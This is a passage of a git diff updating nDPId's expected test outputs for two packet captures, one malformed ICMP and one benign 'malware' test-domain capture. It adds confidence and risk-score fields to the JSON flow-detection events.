diff --git a/test/results/malformed_icmp.pcap.out b/test/results/malformed_icmp.pcap.out
index 6c652539a..dd433252f 100644
--- a/test/results/malformed_icmp.pcap.out
+++ b/test/results/malformed_icmp.pcap.out
@@ -1,8 +1,8 @@
 00446{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"malformed_icmp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00547{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"malformed_icmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593066612951,"flow_last_seen":1593066612951,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1593066612951,"l3_proto":"ip4","src_ip":"218.152.179.213","dst_ip":"218.152.179.54","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 00431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"malformed_icmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1593066612951,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":42,"pkt_l4_len":8,"ts_msec":1593066612951,"pkt":"AFUir8Y3AERm\/CmvCABFAAAcAAEAAEABXqPamLPV2pizNqUAWv8AAAAA"}
-00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"malformed_icmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593066612951,"flow_last_seen":1593066612951,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1593066612951,"l3_proto":"ip4","src_ip":"218.152.179.213","dst_ip":"218.152.179.54","l4_proto":"icmp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"malformed_icmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1593066612951,"flow_last_seen":1593066612951,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1593066612951,"l3_proto":"ip4","src_ip":"218.152.179.213","dst_ip":"218.152.179.54","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00726{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"malformed_icmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593066612951,"flow_last_seen":1593066612951,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1593066612951,"l3_proto":"ip4","src_ip":"218.152.179.213","dst_ip":"218.152.179.54","l4_proto":"icmp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00765{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"malformed_icmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1593066612951,"flow_last_seen":1593066612951,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1593066612951,"l3_proto":"ip4","src_ip":"218.152.179.213","dst_ip":"218.152.179.54","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
 00161{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"malformed_icmp.pcap","alias":"nDPId-test","total-events-serialized":6}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 1/1
@@ -12,10 +12,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4594858 bytes
-~~ total memory freed........: 4594858 bytes
-~~ total allocations/frees...: 99554/99554
+~~ total memory allocated....: 4679811 bytes
+~~ total memory freed........: 4679811 bytes
+~~ total allocations/frees...: 101144/101144
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 166 chars
-~~ json string max len.......: 663 chars
-~~ json string avg len.......: 464 chars
+~~ json string max len.......: 770 chars
+~~ json string avg len.......: 511 chars
diff --git a/test/results/malware.pcap.out b/test/results/malware.pcap.out
index aa04fa0d7..ce704c5f9 100644
--- a/test/results/malware.pcap.out
+++ b/test/results/malware.pcap.out
@@ -1,30 +1,30 @@
 00439{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"malware.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571466977,"flow_last_seen":1569571466977,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1569571466977,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"1.1.1.1","src_port":42370,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569571466977,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"ts_msec":1569571466977,"pkt":"CGoKOl4eMFLLbJwbCABFAABcg9cAAEARLQnAqAcHAQEBAaWCADUASMoKC6QBIAABAAAAAAABA3d3dw9pbnRlcm5ldGJhZGd1eXMDY29tAAABAAEAACkQAAAAAAAADAAKAAjrBFAObfGpig=="}
-00734{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571466977,"flow_last_seen":1569571466977,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1569571466977,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"1.1.1.1","src_port":42370,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.internetbadguys.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571466977,"flow_last_seen":1569571466977,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1569571466977,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"1.1.1.1","src_port":42370,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.internetbadguys.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569571467001,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"ts_msec":1569571467001,"pkt":"MFLLbJwbCGoKOl4eCABFAABgLqZAADcRSzYBAQEBwKgHBwA1pYIATEdsC6SBgAABAAEAAAABA3d3dw9pbnRlcm5ldGJhZGd1eXMDY29tAAABAAHADAABAAEAAAABAARD11zSAAApBawAAAAAAAA="}
-00749{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569571466977,"flow_last_seen":1569571467001,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1569571467001,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"1.1.1.1","src_port":42370,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.internetbadguys.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"67.215.92.210"}}
+00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569571466977,"flow_last_seen":1569571467001,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1569571467001,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"1.1.1.1","src_port":42370,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.internetbadguys.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"67.215.92.210"}}
 00541{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571470672,"flow_last_seen":1569571470672,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1569571470672,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569571470672,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"ts_msec":1569571470672,"pkt":"CGoKOl4eMFLLbJwbCABFAABU4M1AAEABCcTAqAcHkIv33AgApMYAAQABjsKNXQAAAABuRAoAAAAAABAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc="}
-00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571470672,"flow_last_seen":1569571470672,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1569571470672,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.297900}
+00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571470672,"flow_last_seen":1569571470672,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1569571470672,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.297900}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569571476362,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569571476362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569571476362,"pkt":"CGoKOl4eMFLLbJwbCABFAAA0sPtAAEAGObHAqAcHkIv33IOqAFCfbfb4AAAAAIAC+vBQPgAAAgQFtAEBBAIBAwMH"}
-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00569{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569571470672,"flow_last_seen":1569571470672,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00635{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569571466977,"flow_last_seen":1569571467001,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"1.1.1.1","src_port":42370,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569571470672,"flow_last_seen":1569571470672,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569571466977,"flow_last_seen":1569571467001,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"1.1.1.1","src_port":42370,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579408876,"flow_last_seen":1569579408876,"flow_idle_time":7440000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":329,"midstream":1,"ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569579408876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":383,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":383,"pkt_l4_len":349,"ts_msec":1569579408876,"pkt":"CGoKOl4eMFLLbJwbCABFAAFxQQlAAEAGkCXAqAcHQ9dc0r0KAFDJvdSn63fGVVAYAfZpvAAAR0VUIC8gSFRUUC8xLjENCkhvc3Q6IHd3dy5pbnRlcm5ldGJhZGd1eXMuY29tDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo2OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzY4LjANCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC41DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCkROVDogMQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KDQo="}
-00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579408876,"flow_last_seen":1569579408876,"flow_idle_time":7440000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":329,"midstream":1,"ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.OpenDNS","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.internetbadguys.com","url":"www.internetbadguys.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 10.0; rv:68.0) Gecko\/20100101 Firefox\/68.0"}}
+00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579408876,"flow_last_seen":1569579408876,"flow_idle_time":7440000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":329,"midstream":1,"ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OpenDNS","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.internetbadguys.com","url":"www.internetbadguys.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 10.0; rv:68.0) Gecko\/20100101 Firefox\/68.0"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1569579409087,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"ts_msec":1569579409087,"pkt":"MFLLbJwbCGoKOl4eCABFAABUIjBAADgGuBtD11zSwKgHBwBQvQrrd8wJyb3V8FAYAO11CAAALDXKuXRPxt9F45TTtQ17T177PqBz\/8Tm+6YgbZe0R+XFq38BUlr3UR8MAAA="}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579416636,"flow_last_seen":1569579416636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569579416636,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1569579416636,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569579416636,"pkt":"CGoKOl4eMFLLbJwbCABFAAA0xe5AAEAGDH3AqAcHQ9dc0omkAbvdSlrrAAAAAIAC+vBofwAAAgQFtAEBBAIBAwMH"}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1569579416828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569579416828,"pkt":"MFLLbJwbCGoKOl4eCABFAAA0AABAADgG2mtD11zSwKgHBwG7iaQdaco+3Upa7IASchDpWQAAAgQFtAEBBAIBAwMH"}
 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1569579416828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1569579416828,"pkt":"CGoKOl4eMFLLbJwbCABFAAAoxe9AAEAGDIjAqAcHQ9dc0omkAbvdSlrsHWnKP1AQAfZocwAA"}
-00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569579416636,"flow_last_seen":1569579416830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569579416830,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569579416636,"flow_last_seen":1569579417029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"ts_msec":1569579417029,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"0c0aff9ccea5e7e1de5c3a0069d103f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-02355{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569579416636,"flow_last_seen":1569579417030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4897,"flow_avg_l4_payload_len":489,"midstream":0,"ts_msec":1569579417030,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10":"TLS Certificate Mismatch"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Network"},"tls": 